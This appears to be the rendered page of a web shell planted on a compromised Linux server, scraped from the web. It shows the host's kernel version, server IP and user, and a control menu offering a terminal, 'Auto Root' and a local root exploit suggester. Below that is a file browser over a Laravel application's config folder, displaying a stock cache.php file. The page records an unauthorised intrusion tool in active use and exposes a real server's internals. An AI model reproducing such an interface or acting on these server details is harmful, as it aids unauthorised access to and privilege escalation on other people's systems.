Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.141.29.119
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
app.php
9.07
KB
-rw-r--r--
2021-05-05 18:39
auth.php
3.17
KB
-rw-r--r--
2021-02-09 19:47
broadcasting.php
1.67
KB
-rw-r--r--
2021-03-22 11:47
cache.php
2.63
KB
-rw-r--r--
2021-02-09 19:47
database.php
4.3
KB
-rw-r--r--
2021-11-23 09:14
filesystems.php
2.08
KB
-rw-r--r--
2021-02-09 19:47
hashing.php
1.53
KB
-rw-r--r--
2021-02-09 19:47
logging.php
2.5
KB
-rw-r--r--
2021-02-09 19:47
mail.php
4.61
KB
-rw-r--r--
2021-06-07 11:11
queue.php
2.57
KB
-rw-r--r--
2021-02-09 19:47
services.php
1.19
KB
-rw-r--r--
2021-02-09 19:47
session.php
6.79
KB
-rw-r--r--
2021-05-25 07:32
view.php
1.03
KB
-rw-r--r--
2021-02-09 19:47
websockets.php
2.99
KB
-rw-r--r--
2021-02-09 19:47
Save
Rename
<?php use Illuminate\Support\Str; return [ /* |-------------------------------------------------------------------------- | Default Cache Store |-------------------------------------------------------------------------- | | This option controls the default cache connection that gets used while | using this caching library. This connection is used when another is | not explicitly specified when executing a given caching function. | | Supported: "apc", "array", "database", "file", "memcached", "redis" | */ 'default' => env('CACHE_DRIVER', 'file'), /* |-------------------------------------------------------------------------- | Cache Stores |-------------------------------------------------------------------------- | | Here you may define all of the cache "stores" for your application as | well as their drivers. You may even define multiple stores for the | same cache driver to group types of items stored in your caches. | */ 'stores' => [ 'apc' => [ 'driver' => 'apc', ], 'array' => [ 'driver' => 'array', ], 'database' => [ 'driver' => 'database', 'table' => 'cache', 'connection' => null, ], 'file' => [ 'driver' => 'file', 'path' => storage_path('framework/cache/data'), ], 'memcached' => [ 'driver' => 'memcached', 'persistent_id' => env('MEMCACHED_PERSISTENT_ID'), 'sasl' => [ env('MEMCACHED_USERNAME'), env('MEMCACHED_PASSWORD'), ], 'options' => [ // Memcached::OPT_CONNECT_TIMEOUT => 2000, ], 'servers' => [ [ 'host' => env('MEMCACHED_HOST', '127.0.0.1'), 'port' => env('MEMCACHED_PORT', 11211), 'weight' => 100, ], ], ], 'redis' => [ 'driver' => 'redis', 'connection' => 'cache', ], ], /* |-------------------------------------------------------------------------- | Cache Key Prefix |-------------------------------------------------------------------------- | | When utilizing a RAM based store such as APC or Memcached, there might | be other applications utilizing the same cache. So, we'll specify a | value to get prefixed to all our keys so we can avoid collisions. | */ 'prefix' => env('CACHE_PREFIX', Str::slug(env('APP_NAME', 'laravel'), '_').'_cache'), ];